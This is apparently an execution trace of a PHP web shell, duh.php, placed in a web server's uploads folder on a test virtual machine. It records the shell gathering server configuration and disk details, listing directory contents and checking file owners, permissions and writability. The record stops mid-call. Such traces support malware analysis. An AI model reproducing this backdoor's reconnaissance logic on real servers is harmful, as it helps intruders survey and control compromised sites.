1 A /var/www/html/uploads/duh.php 10 $moreI = ['PHP Version' => '7.2.34-37+ubuntu22.04.1+deb.sury.org+1', 'Zend Version' => '3.2.0', 'Magic Quotes' => '<font color=#ccff00>OFF</font>', 'Curl' => '<font color=crimson>ON</font>', 'Register Globals' => '<font color=#ccff00>OFF</font>', 'OpenBase Dir' => '<font color=#ccff00>OFF</font>', 'MySQL' => '<font color=#ccff00>OFF</font>', 'Gzip' => '<font color=crimson>ON</font>', 'MsSQL' => '<font color=#ccff00>OFF</font>', 'PostgreSQL' => '<font color=#ccff00>OFF</font>', 'Oracle' => '<font color=#ccff00>OFF</font>', 'Total Space' => '216.08GB', 'Used Space' => '186.77GB', 'Your IP' => '127.0.0.1', 'Server IP' => '127.0.0.1']
1 A /var/www/html/uploads/duh.php 10 $n = 'PHP Version'
1 A /var/www/html/uploads/duh.php 10 $n = 'Zend Version'
1 A /var/www/html/uploads/duh.php 10 $n = 'Magic Quotes'
1 A /var/www/html/uploads/duh.php 10 $n = 'Curl'
1 A /var/www/html/uploads/duh.php 10 $n = 'Register Globals'
1 A /var/www/html/uploads/duh.php 10 $n = 'OpenBase Dir'
1 A /var/www/html/uploads/duh.php 10 $n = 'MySQL'
1 A /var/www/html/uploads/duh.php 10 $n = 'Gzip'
1 A /var/www/html/uploads/duh.php 10 $n = 'MsSQL'
1 A /var/www/html/uploads/duh.php 10 $n = 'PostgreSQL'
1 A /var/www/html/uploads/duh.php 10 $n = 'Oracle'
1 A /var/www/html/uploads/duh.php 10 $n = 'Total Space'
1 A /var/www/html/uploads/duh.php 10 $n = 'Used Space'
1 A /var/www/html/uploads/duh.php 10 $n = 'Your IP'
1 A /var/www/html/uploads/duh.php 10 $n = 'Server IP'
2 41 0 0.002314 491560 curpath 1 /var/www/html/uploads/duh.php 34 1 ''
3 42 0 0.002328 491560 getcwd 0 /var/www/html/uploads/duh.php 55 0
3 42 1 0.002341 491608
3 42 R '/var/www/html/uploads'
2 A /var/www/html/uploads/duh.php 55 $d = '/var/www/html/uploads'
2 A /var/www/html/uploads/duh.php 55 $p = ''
2 A /var/www/html/uploads/duh.php 55 $n = ''
3 43 0 0.002384 491608 explode 0 /var/www/html/uploads/duh.php 55 2 '/' '/var/www/html/uploads'
3 43 1 0.002400 492184
3 43 R [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
2 A /var/www/html/uploads/duh.php 55 $dx = [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
2 A /var/www/html/uploads/duh.php 55 $i = 0
2 A /var/www/html/uploads/duh.php 55 $g = ''
2 A /var/www/html/uploads/duh.php 55 $p .= '/'
2 A /var/www/html/uploads/duh.php 55 $n .= '<a href="?d=/"></a>/'
2 A /var/www/html/uploads/duh.php 55 $i++
2 A /var/www/html/uploads/duh.php 55 $g = 'var'
2 A /var/www/html/uploads/duh.php 55 $p .= 'var/'
2 A /var/www/html/uploads/duh.php 55 $n .= '<a href="?d=/var/">var</a>/'
2 A /var/www/html/uploads/duh.php 55 $i++
2 A /var/www/html/uploads/duh.php 55 $g = 'www'
2 A /var/www/html/uploads/duh.php 55 $p .= 'www/'
2 A /var/www/html/uploads/duh.php 55 $n .= '<a href="?d=/var/www/">www</a>/'
2 A /var/www/html/uploads/duh.php 55 $i++
2 A /var/www/html/uploads/duh.php 55 $g = 'html'
2 A /var/www/html/uploads/duh.php 55 $p .= 'html/'
2 A /var/www/html/uploads/duh.php 55 $n .= '<a href="?d=/var/www/html/">html</a>/'
2 A /var/www/html/uploads/duh.php 55 $i++
2 A /var/www/html/uploads/duh.php 55 $g = 'uploads'
2 A /var/www/html/uploads/duh.php 55 $p .= 'uploads/'
2 A /var/www/html/uploads/duh.php 55 $n .= '<a href="?d=/var/www/html/uploads/">uploads</a>/'
2 A /var/www/html/uploads/duh.php 55 $i++
2 41 1 0.002626 491752
2 41 R '<a href="?d=/"></a>/<a href="?d=/var/">var</a>/<a href="?d=/var/www/">www</a>/<a href="?d=/var/www/html/">html</a>/<a href="?d=/var/www/html/uploads/">uploads</a>/'
2 44 0 0.002647 491560 realpath 0 /var/www/html/uploads/duh.php 35 1 '.'
2 44 1 0.002661 491640
2 44 R '/var/www/html/uploads'
2 45 0 0.002675 491784 realpath 0 /var/www/html/uploads/duh.php 35 1 '.'
2 45 1 0.002688 491864
2 45 R '/var/www/html/uploads'
2 46 0 0.002703 491944 realpath 0 /var/www/html/uploads/duh.php 35 1 '.'
2 46 1 0.002716 492024
2 46 R '/var/www/html/uploads'
2 47 0 0.002729 492008 realpath 0 /var/www/html/uploads/duh.php 35 1 '.'
2 47 1 0.002742 492088
2 47 R '/var/www/html/uploads'
2 48 0 0.002755 492328 realpath 0 /var/www/html/uploads/duh.php 35 1 '.'
2 48 1 0.002768 492408
2 48 R '/var/www/html/uploads'
2 49 0 0.002781 492456 realpath 0 /var/www/html/uploads/duh.php 35 1 '.'
2 49 1 0.002794 492536
2 49 R '/var/www/html/uploads'
1 A /var/www/html/uploads/duh.php 37 $filex = []
1 A /var/www/html/uploads/duh.php 38 $dirx = []
2 50 0 0.002841 491672 opendir 0 /var/www/html/uploads/duh.php 40 1 '.'
2 50 1 0.002865 492064
2 50 R resource(4) of type (stream)
1 A /var/www/html/uploads/duh.php 40 $handle = resource(4) of type (stream)
2 51 0 0.002901 492032 readdir 0 /var/www/html/uploads/duh.php 40 1 resource(4) of type (stream)
2 51 1 0.002928 492104
2 51 R '..'
1 A /var/www/html/uploads/duh.php 40 $file = '..'
2 52 0 0.002952 492064 is_dir 0 /var/www/html/uploads/duh.php 40 1 '..'
2 52 1 0.002970 492112
2 52 R TRUE
1 A /var/www/html/uploads/duh.php 40 $dirx[] .= '..'
2 53 0 0.002995 492480 readdir 0 /var/www/html/uploads/duh.php 40 1 resource(4) of type (stream)
2 53 1 0.003009 492552
2 53 R '.'
1 A /var/www/html/uploads/duh.php 40 $file = '.'
2 54 0 0.003044 492480 is_dir 0 /var/www/html/uploads/duh.php 40 1 '.'
2 54 1 0.003059 492520
2 54 R TRUE
1 A /var/www/html/uploads/duh.php 40 $dirx[] .= '.'
2 55 0 0.003083 492512 readdir 0 /var/www/html/uploads/duh.php 40 1 resource(4) of type (stream)
2 55 1 0.003096 492584
2 55 R 'duh.php'
1 A /var/www/html/uploads/duh.php 40 $file = 'duh.php'
2 56 0 0.003120 492512 is_dir 0 /var/www/html/uploads/duh.php 40 1 'duh.php'
2 56 1 0.003134 492552
2 56 R FALSE
1 A /var/www/html/uploads/duh.php 40 $filex[] .= 'duh.php'
2 57 0 0.003158 492920 readdir 0 /var/www/html/uploads/duh.php 40 1 resource(4) of type (stream)
2 57 1 0.003171 493000
2 57 R 'prepend.php'
1 A /var/www/html/uploads/duh.php 40 $file = 'prepend.php'
2 58 0 0.003195 492928 is_dir 0 /var/www/html/uploads/duh.php 40 1 'prepend.php'
2 58 1 0.003210 492976
2 58 R FALSE
1 A /var/www/html/uploads/duh.php 40 $filex[] .= 'prepend.php'
2 59 0 0.003234 492976 readdir 0 /var/www/html/uploads/duh.php 40 1 resource(4) of type (stream)
2 59 1 0.003248 493048
2 59 R 'data'
1 A /var/www/html/uploads/duh.php 40 $file = 'data'
2 60 0 0.003271 492968 is_dir 0 /var/www/html/uploads/duh.php 40 1 'data'
2 60 1 0.003285 493000
2 60 R TRUE
1 A /var/www/html/uploads/duh.php 40 $dirx[] .= 'data'
2 61 0 0.003308 492992 readdir 0 /var/www/html/uploads/duh.php 40 1 resource(4) of type (stream)
2 61 1 0.003321 493072
2 61 R '.htaccess'
1 A /var/www/html/uploads/duh.php 40 $file = '.htaccess'
2 62 0 0.003345 493000 is_dir 0 /var/www/html/uploads/duh.php 40 1 '.htaccess'
2 62 1 0.003360 493048
2 62 R FALSE
1 A /var/www/html/uploads/duh.php 40 $filex[] .= '.htaccess'
2 63 0 0.003383 493048 readdir 0 /var/www/html/uploads/duh.php 40 1 resource(4) of type (stream)
2 63 1 0.003397 493088
2 63 R FALSE
1 A /var/www/html/uploads/duh.php 40 $file = FALSE
2 64 0 0.003420 493032 asort 0 /var/www/html/uploads/duh.php 40 1 [0 => 'duh.php', 1 => 'prepend.php', 2 => '.htaccess']
2 64 1 0.003438 493064
2 64 R TRUE
2 65 0 0.003451 493056 asort 0 /var/www/html/uploads/duh.php 40 1 [0 => '..', 1 => '.', 2 => 'data']
2 65 1 0.003466 493088
2 65 R TRUE
1 A /var/www/html/uploads/duh.php 40 $i = 0
2 66 0 0.003488 493056 function_exists 0 /var/www/html/uploads/duh.php 41 1 'posix_getpwuid'
2 66 1 0.003502 493096
2 66 R TRUE
2 67 0 0.003514 493056 function_exists 0 /var/www/html/uploads/duh.php 41 1 'posix_getgrgid'
2 67 1 0.003528 493096
2 67 R TRUE
2 68 0 0.003540 493056 fileowner 0 /var/www/html/uploads/duh.php 41 1 '.'
2 68 1 0.003554 493088
2 68 R 0
2 69 0 0.003567 493048 posix_getpwuid 0 /var/www/html/uploads/duh.php 41 1 0
2 69 1 0.003598 493848
2 69 R ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
1 A /var/www/html/uploads/duh.php 41 $own = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
2 70 0 0.003639 493816 filegroup 0 /var/www/html/uploads/duh.php 41 1 '.'
2 70 1 0.003653 493856
2 70 R 0
2 71 0 0.003665 493816 posix_getgrgid 0 /var/www/html/uploads/duh.php 41 1 0
2 71 1 0.003689 494472
2 71 R ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
1 A /var/www/html/uploads/duh.php 41 $grp = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
2 72 0 0.003729 494504 realpath 0 /var/www/html/uploads/duh.php 41 1 '.'
2 72 1 0.003743 494584
2 72 R '/var/www/html/uploads'
2 73 0 0.003759 494600 realpath 0 /var/www/html/uploads/duh.php 41 1 '.'
2 73 1 0.003771 494680
2 73 R '/var/www/html/uploads'
2 74 0 0.003786 494664 realpath 0 /var/www/html/uploads/duh.php 41 1 '.'
2 74 1 0.003798 494744
2 74 R '/var/www/html/uploads'
2 75 0 0.003813 495080 realpath 0 /var/www/html/uploads/duh.php 41 1 '.'
2 75 1 0.003825 495160
2 75 R '/var/www/html/uploads'
2 76 0 0.003838 495080 realpath 0 /var/www/html/uploads/duh.php 41 1 '.'
2 76 1 0.003850 495160
2 76 R '/var/www/html/uploads'
2 77 0 0.003865 495336 get_color 1 /var/www/html/uploads/duh.php 41 1 '.'
3 78 0 0.003878 495336 is_writable 0 /var/www/html/uploads/duh.php 56 1 '.'
3 78 1 0.003897 495376
3 78 R TRUE
2 A /var/www/html/uploads/duh.php 56 $c = '#ccff00'
3 79 0 0.003920 495336 is_writable 0 /var/www/html/uploads/duh.php 56 1 '.'
3 79 1 0.003934 495376
3 79 R TRUE
3 80 0 0.003947 495336 is_writable 0 /var/www/html/uploads/duh.php 56 1 '.'
3 80 1 0.003961 495376
3 80 R TRUE
2 77 1 0.003974 495336
2 77 R '#ccff00'
2 81 0 0.003987 495336 perms 1 /var/www/html/uploads/duh.php 41 1 '.'
3 82 0 0.003999 495336 file_exists 0 /var/www/html/uploads/duh.php 57 1 '.'
3 82 1 0.004013 495376
3 82 R TRUE
3 83 0 0.004027 495336 fileperms 0 /var/www/html/uploads/duh.php 57 1 '.'
3 83 1 0.004039 495376
3 83 R 16895
3 84 0 0.004051 495336 sprintf 0 /var/www/html/uploads/duh.php 57 2 '%o' 16895
3 84 1 0.004064 495720
3 84 R '40777'
3 85 0 0.004077 495656 substr 0 /var/www/html/uploads/duh.php 57 2 '40777' -4
3 85 1 0.004090 495752
3 85 R '0777'
2 81 1 0.004103 495368
2 81 R '0777'
2 86 0 0.004116 495464 realpath 0 /var/www/html/uploads/duh.php 41 1 '.'
2 86 1 0.004129 495544
2 86 R '/var/www/html/uploads'
2 87 0 0.004143 495464 realpath 0 /var/www/html/uploads/duh.php 41 1 '.'
2 87 1 0.004155 495544
2 87 R '/var/www/html/uploads'
2 88 0 0.004169 495720 perms 1 /var/www/html/uploads/duh.php 41 1 '.'
3 89 0 0.004181 495720 file_exists 0 /var/www/html/uploads/duh.php 57 1 '.'
3 89 1 0.004194 495760
3 89 R TRUE
3 90 0 0.004207 495720 fileperms 0 /var/www/html/uploads/duh.php 57 1 '.'
3 90 1 0.004219 495760
3 90 R 16895
3 91 0 0.004231 495720 sprintf 0 /var/www/html/uploads/duh.php 57 2 '%o' 16895
3 91 1 0.004244 496104
3 91 R '40777'
3 92 0 0.004256 496040 substr 0 /var/www/html/uploads/duh.php 57 2 '40777' -4
3 92 1 0.004268 496136
3 92 R '0777'
2 88 1 0.004281 495752
2 88 R '0777'
1 A /var/www/html/uploads/duh.php 41 $i++
2 93 0 0.004305 494440 function_exists 0 /var/www/html/uploads/duh.php 41 1 'posix_getpwuid'
2 93 1 0.004318 494480
2 93 R TRUE
2 94 0 0.004330 494440 function_exists 0 /var/www/html/uploads/duh.php 41 1 'posix_getgrgid'
2 94 1 0.004342 494480
2 94 R TRUE
2 95 0 0.004354 494440 fileowner 0 /var/www/html/uploads/duh.php 41 1 '..'
2 95 1 0.004368 494480
2 95 R 0
2 96 0 0.004380 494440 posix_getpwuid 0 /var/www/html/uploads/duh.php 41 1 0
2 96 1 0.004402 495240
2 96 R ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
1 A /var/www/html/uploads/duh.php 41 $own = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
2 97 0 0.004446 494440 filegroup 0 /var/www/html/uploads/duh.php 41 1 '..'
2 97 1 0.004458 494480
2 97 R 0
2 98 0 0.004518 494440 posix_getgrgid 0 /var/www/html/uploads/duh.php 41 1 0
2 98 1 0.004543 495096
2 98 R ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
1 A /var/www/html/uploads/duh.php 41 $grp = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
2 99 0 0.004584 494504 realpath 0 /var/www/html/uploads/duh.php 41 1 '..'
2 99 1 0.004598 494576
2 99 R '/var/www/html'
2 100 0 0.004613 494600 realpath 0 /var/www/html/uploads/duh.php 41 1 '.'
2 100 1 0.004626 494680
2 100 R '/var/www/html/uploads'
2 101 0 0.004640 494664 realpath 0 /var/www/html/uploads/duh.php 41 1 '.'
2 101 1 0.004652 494744
2 101 R '/var/www/html/uploads'
2 102 0 0.004667 495080 realpath 0 /var/www/html/uploads/duh.php 41 1 '.'
2 102 1 0.004679 495160
2 102 R '/var/www/html/uploads'
2 103 0 0.004693 495080 realpath 0 /var/www/html/uploads/duh.php 41 1 '..'
2 103 1 0.004705 495152
2 103 R '/var/www/html'
2 104 0 0.004720 495336 get_color 1 /var/www/html/uploads/duh.php 41 1 '..'
3 105 0 0.004732 495336 is_writable 0 /var/www/html/uploads/duh.php 56 1 '..'
3 105 1 0.004747 495376
3 105 R TRUE
2 A /var/www/html/uploads/duh.php 56 $c = '#ccff00'
3 106 0 0.004770 495336 is_writable 0 /var/www/html/uploads/duh.php 56 1 '..'
3 106 1 0.004784 495376
3 106 R TRUE
3 107 0 0.004797 495336 is_writable 0 /var/www/html/uploads/duh.php 56 1 '..'
3 107 1 0.004810 495376
3 107 R TRUE
2 104 1 0.004823 495336
2 104 R '#ccff00'
2 108 0 0.004836 495336 perms 1 /var/www/html/uploads/duh.php 41 1 '..'
3 109 0 0.004848 495336 file_exists 0 /var/www/html/uploads/duh.php 57 1 '..'
3 109 1 0.004862 495376
3 109 R TRUE
3 110 0 0.004874 495336 fileperms 0 /var/www/html/uploads/duh.php 57 1 '..'
3 110 1 0.004886 495376
3 110 R 16895
3 111 0 0.004899 495336 sprintf 0 /var/www/html/uploads/duh.php 57 2 '%o' 16895
3 111 1 0.004912 495720
3 111 R '40777'
3 112 0 0.004924 495656 substr 0 /var/www/html/uploads/duh.php 57 2 '40777' -4
3 112 1 0.004936 495752
3 112 R '0777'
2 108 1 0.004949 495368
2 108 R '0777'
2 113 0 0.004962 495464 realpath 0 /var/www/html/uploads/duh.php 41 1 '.'
2 113 1 0.004975 495544
2 113 R '/var/www/html/uploads'
2 114 0 0.004989 495464 realpath 0 /var/www/html/uploads/duh.php 41 1 '..'
2 114 1 0.005001 495536
2 114 R '/var/www/html'
2 115 0 0.005016 495720 perms 1 /var/www/html/uploads/duh.php 41 1 '..'
3 116 0 0.005027 495720 file_exists 0 /var/www/html/uploads/duh.php 57 1 '..'
3 116 1 0.005041 495760
3 116 R TRUE
3 117 0 0.005054 495720 fileperms 0 /var/www/html/uploads/duh.php 57 1 '..'
3 117 1 0.005065 495760
3 117 R 16895
3 118 0 0.005077 495720 sprintf 0 /var/www/html/uploads/duh.php 57 2 '%o' 16895
3 118 1 0.005090 496104
3 118 R '40777'
3 119 0 0.005102 496040 substr 0 /var/www/html/uploads/duh.php 57 2 '40777' -4
3 119 1 0.005114 496136
3 119 R '0777'
2 115 1 0.005127 495752
2 115 R '0777'
1 A /var/www/html/uploads/duh.php 41 $i++
2 120 0 0.005150 494440 function_exists 0 /var/www/html/uploads/duh.php 41 1 'posix_getpwuid'
2 120 1 0.005163 494480
2 120 R TRUE
2 121 0 0.005176 494440 function_exists 0 /var/www/html/uploads/duh.php 41 1 'posix_getgrgid'
2 121 1 0.005189 494480
2 121 R TRUE
2 122 0 0.005201 494440 fileowner 0 /var/www/html/uploads/duh.php 41 1 'data'
2 122 1 0.005214 494480
2 122 R 0
2 123 0 0.005226 494440 posix_getpwuid 0 /var/www/html/uploads/duh.php 41 1 0
2 123 1 0.005249 495240
2 123 R ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
1 A /var/www/html/uploads/duh.php 41 $own = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
2 124 0 0.005290 494440 filegroup 0 /var/www/html/uploads/duh.php 41 1 'data'
2 124 1 0.005302 494480
2 124 R 0
2 125 0 0.005314 494440 posix_getgrgid 0 /var/www/html/uploads/duh.php 41 1 0
2 125 1 0.005335 495096
2 125 R ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
1 A /var/www/html/uploads/duh.php 41 $grp = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
2 126 0 0.005374 494520 realpath 0 /var/www/html/uploads/duh.php 41 1 'data'
2 126 1 0.005391 494608
2 126 R '/var/www/html/uploads/data'
2 127 0 0.005407 494632 realpath 0 /var/www/html/uploads/duh.php 41 1 '.'
2 127 1 0.005419 494712
2 127 R '/var/www/html/uploads'
2 128 0 0.005433 494696 realpath 0 /var/www/html/uploads/duh.php 41 1 '.'
2 128 1 0.005445 494776
2 128 R '/var/www/html/uploads'
2 129 0 0.005459 495080 realpath 0 /var/www/html/uploads/duh.php 41 1 '.'
2 129 1 0.005471 495160
2 129 R '/var/www/html/uploads'
2 130 0 0.005484 495080 realpath 0 /var/www/html/uploads/duh.php 41 1 'data'
2 130 1 0.005497 495168
2 130 R '/var/www/html/uploads/data'
2 131 0 0.005512 495464 get_color 1 /var/www/html/uploads/duh.php 41 1 'data'
3 132 0 0.005524 495464 is_writable 0 /var/www/html/uploads/duh.php 56 1 'data'
3 132 1 0.005538 495504
3 132 R TRUE
2 A /var/www/html/uploads/duh.php 56 $c = '#ccff00'
3 133 0 0.005561 495464 is_writable 0 /var/www/html/uploads/duh.php 56 1 'data'
3 133 1 0.005575 495504
3 133 R TRUE
3 134 0 0.005588 495464 is_writable 0 /var/www/html/uploads/duh.php 56 1 'data'
3 134 1 0.005601 495504
3 134 R TRUE
2 131 1 0.005614 495464
2 131 R '#ccff00'
2 135 0 0.005628 495464 perms 1 /var/www/html/uploads/duh.php 41 1 'data'
3 136 0 0.005639 495464 file_exists 0 /var/www/html/uploads/duh.php 57 1 'data'
3 136 1 0.005652 495504
3 136 R TRUE
3 137 0 0.005665 495464 fileperms 0 /var/www/html/uploads/duh.php 57 1 'data'
3 137 1 0.005677 495504
3 137 R 16895
3 138 0 0.005698 495464 sprintf 0 /var/www/html/uploads/duh.php 57 2 '%o' 16895
3 138 1 0.005712 495848
3 138 R '40777'
3 139 0 0.005725 495784 substr 0 /var/www/html/uploads/duh.php 57 2 '40777' -4
3 139 1 0.005737 495880
3 139 R '0777'
2 135 1 0.005750 495496
2 135 R '0777'
2 140 0 0.005763 495464 realpath 0 /var/www/html/uploads/duh.php 41 1 '.'
2 140 1 0.005776 495544
2 140 R '/var/www/html/uploads'
2 141 0 0.005790 495720 realpath 0 /var/www/html/uploads/duh.php 41 1 'data'
2 141 1 0.005803 495808
2 141 R '/var/www/html/uploads/data'
2 142 0 0.005818 495720 perms 1 /var/www/html/uploads/duh.php 41 1 'data'
3 143 0 0.005829 495720 file_exists 0 /var/www/html/uploads/duh.php 57 1 'data'
3 143 1 0.005844 495760
3 143 R TRUE
3 144 0 0.005856 495720 fileperms 0 /var/www/html/uploads/duh.php 57 1 'data'
3 144 1 0.005868 495760
3 144 R 16895
3 145 0 0.005881 495720 sprintf 0 /var/www/html/uploads/duh.php 57 2 '%o' 16895
3 145 1 0.005893 496104
3 145 R '40777'
3 146 0 0.005905 496040 substr 0 /var/www/html/uploads/duh.php 57 2 '40777' -4
3 146 1 0.005917 496136
3 146 R '0777'
2 142 1 0.005930 495752
2 142 R '0777'
1 A /var/www/html/uploads/duh.php 41 $i++
2 147 0 0.006055 494440 function_exists 0 /var/www/html/uploads/duh.php 42 1 'posix_getpwuid'
2 147 1 0.006069 494480
2 147 R TRUE
2 148 0 0.006082 494440 function_exists 0 /var/www/html/uploads/duh.php 42 1 'posix_getgrgid'
2 148 1 0.006095 494480
2 148 R TRUE
2 149 0 0.006108 494440 fileowner 0 /var/www/html/uploads/duh.php 42 1 '.htaccess'
2 149 1 0.006122 494488
2 149 R 0
2 150 0 0.006135 494448 posix_getpwuid 0 /var/www/html/uploads/duh.php 42 1 0
2 150 1 0.006158 495248
2 150 R ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
1 A /var/www/html/uploads/duh.php 42 $own = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
2 151 0 0.006199 494448 filegroup 0 /var/www/html/uploads/duh.php 42 1 '.htaccess'
2 151 1 0.006212 494488
2 151 R 0
2 152 0 0.006224 494448 posix_getgrgid 0 /var/www/html/uploads/duh.php 42 1 0
2 152 1 0.006245 495104
2 152 R ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
1 A /var/www/html/uploads/duh.php 42 $grp = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
2 153 0 0.006283 494528 realpath 0 /var/www/html/uploads/duh.php 42 1 '.'
2 153 1 0.006297 494608
2 153 R '/var/www/html/uploads'
2 154 0 0.006313 494640 realpath 0 /var/www/html/uploads/duh.php 42 1 '.'
2 154 1 0.006325 494720
2 154 R '/var/www/html/uploads'
2 155 0 0.006339 494704 realpath 0 /var/www/html/uploads/duh.php 42 1 '.'
2 155 1 0.006351 494784
2 155 R '/var/www/html/uploads'
2 156 0 0.006367 495088 realpath 0 /var/www/html/uploads/duh.php 42 1 '.'
2 156 1 0.006379 495168
2 156 R '/var/www/html/uploads'
2 157 0 0.006393 495216 realpath 0 /var/www/html/uploads/duh.php 42 1 '.htaccess'
2 157 1 0.006407 495304
2 157 R '/var/www/html/uploads/.htaccess'
2 158 0 0.006423 495472 get_color 1 /var/www/html/uploads/duh.php 42 1 '.htaccess'
3 159 0 0.006436 495472 is_writable 0 /var/www/html/uploads/duh.php 56 1 '.htaccess'
3 159 1 0.006451 495512
3 159 R FALSE
3 160 0 0.006464 495472 is_writable 0 /var/www/html/uploads/duh.php 56 1 '.htaccess'
3 160 1 0.006478 495512
3 160 R FALSE
3 161 0 0.006491 495472 is_readable 0 /var/www/html/uploads/duh.php 56 1 '.htaccess'
3 161 1 0.006504 495512
3 161 R TRUE
2 A /var/www/html/uploads/duh.php 56 $c = ''
3 162 0 0.006530 495472 is_writable 0 /var/www/html/uploads/duh.php 56 1 '.htaccess'
3 162 1 0.006543 495512
3 162 R FALSE
3 163 0 0.006556 495472 is_readable 0 /var/www/html/uploads/duh.php 56 1 '.htaccess'
3 163 1 0.006570 495512
3 163 R TRUE
2 158 1 0.006583 495472
2 158 R ''
2 164 0 0.006596 495472 perms 1 /var/www/html/uploads/duh.php 42 1 '.htaccess'
3 165 0 0.006608 495472 file_exists 0 /var/www/html/uploads/duh.php 57 1 '.htaccess'
3 165 1 0.006622 495512
3 165 R TRUE
3 166 0 0.006634 495472 fileperms 0 /var/www/html/uploads/duh.php 57 1 '.htaccess'
3 166 1 0.006647 495512
3 166 R 33188
3 167 0 0.006659 495472 sprintf 0 /var/www/html/uploads/duh.php 57 2 '%o' 33188
3 167 1 0.006672 495856
3 167 R '100644'
3 168 0 0.006684 495792 substr 0 /var/www/html/uploads/duh.php 57 2 '100644' -4
3 168 1 0.006697 495888
3 168 R '0644'
2 164 1 0.006710 495504
2 164 R '0644'
2 169 0 0.006723 495728 realpath 0 /var/www/html/uploads/duh.php 42 1 '.'
2 169 1 0.006735 495808
2 169 R '/var/www/html/uploads'
2 170 0 0.006750 495728 realpath 0 /var/www/html/uploads/duh.php 42 1 '.htaccess'
2 170 1 0.006763 495816
2 170 R '/var/www/html/uploads/.htaccess'
2 171 0 0.006778 495728 perms 1 /var/www/html/uploads/duh.php 42 1 '.htaccess'
3 172 0 0.006790 495728 file_exists 0 /var/www/html/uploads/duh.php 57 1 '.htaccess'
3 172 1 0.006804 495768
3 172 R TRUE
3 173 0 0.006817 495728 fileperms 0 /var/www/html/uploads/duh.php 57 1 '.htaccess'
3 173 1 0.006829 495768
3 173 R 33188
3 174 0 0.006841 495728 sprintf 0 /var/www/html/uploads/duh.php 57 2 '%o' 33188
3 174 1 0.006854 496112
3 174 R '100644'
3 175 0 0.006866 496048 substr 0 /var/www/html/uploads/duh.php 57 2 '100644' -4
3 175 1 0.006879 496144
3 175 R '0644'
2 171 1 0.006892 495760
2 171 R '0644'
2 176 0 0.006906 494448 function_exists 0 /var/www/html/uploads/duh.php 42 1 'posix_getpwuid'
2 176 1 0.006919 494488
2 176 R TRUE
2 177 0 0.006931 494448 function_exists 0 /var/www/html/uploads/duh.php 42 1 'posix_getgrgid'
2 177 1 0.006944 494488
2 177 R TRUE
2 178 0 0.006957 494448 fileowner 0 /var/www/html/uploads/duh.php 42 1 'duh.php'
2 178 1 0.006971 494480
2 178 R 1000
2 179 0 0.006983 494440 posix_getpwuid 0 /var/www/html/uploads/duh.php 42 1 1000
2 179 1 0.007013 495256
2 179 R ['name' => 'osboxes', 'passwd' => 'x', 'uid' => 1000, 'gid' => 1000, 'gecos' => 'osboxes.org,,,', 'dir' => '/home/osboxes', 'shell' => '/bin/bash']
1 A /var/www/html/uploads/duh.php 42 $own = ['name' => 'osboxes', 'passwd' => 'x', 'uid' => 1000, 'gid' => 1000, 'gecos' => 'osboxes.org,,,', 'dir' => '/home/osboxes', 'shell' => '/bin/bash']
2 180 0 0.007066 494456 filegroup 0 /var/www/html/uploads/duh.php 42 1 'duh.php'
2 180 1 0.007079 494496
2 180 R 1000
2 181 0 0.007092 494456 posix_getgrgid 0 /var/www/html/uploads/duh.php 42 1 1000
2 181 1 0.007123 495112
2 181 R ['name' => 'osboxes', 'passwd' => 'x', 'members' => [], 'gid' => 1000]
1 A /var/www/html/uploads/duh.php 42 $grp = ['name' => 'osboxes', 'passwd' => 'x', 'members' => [], 'gid' => 1000]
2 182 0 0.007159 494536 realpath 0 /var/www/html/uploads/duh.php 42 1 '.'
2 182 1 0.007172 494616
2 182 R '/var/www/html/uploads'
2 183 0 0.007187 494648 realpath 0 /var/www/html/uploads/duh.php 42 1 '.'
2 183 1 0.007199 494728
2 183 R '/var/www/html/uploads'
2 184 0 0.007214 494712 realpath 0 /var/www/html/uploads/duh.php 42 1 '.'
2 184 1 0.007226 494792
2 184 R '/var/www/html/uploads'
2 185 0 0.007240 495096 realpath 0 /var/www/html/uploads/duh.php 42 1 '.'
2 185 1 0.007253 495176
2 185 R '/var/www/html/uploads'
2 186 0 0.007266 495224 realpath 0 /var/www/html/uploads/duh.php 42 1 'duh.php'
2 186 1 0.007279 495312
2 186 R '/var/www/html/uploads/duh.php'
2 187 0 0.007295 495480 get_color 1 /var/www/html/uploads/duh.php 42 1 'duh.php'
3 188 0 0.007307 495480 is_writable 0 /var/www/html/uploads/duh.php 56 1 'duh.php'
3 188 1 0.007322 495520
3 188 R FALSE
3 189 0 0.007335 495480 is_writable 0 /var/www/html/uploads/duh.php 56 1 'duh.php'
3 189 1 0.007349 495520
3 189 R FALSE
3 190 0 0.007361 495480 is_readable 0 /var/www/html/uploads/duh.php 56 1 'duh.php'
3 190 1 0.007375 495520
3 190 R TRUE
2 A /var/www/html/uploads/duh.php 56 $c = ''
3 191 0 0.007399 495480 is_writable 0 /var/www/html/uploads/duh.php 56 1 'duh.php'
3 191 1 0.007413 495520
3 191 R FALSE
3 192 0 0.007426 495480 is_readable 0 /var/www/html/uploads/duh.php 56 1 'duh.php'
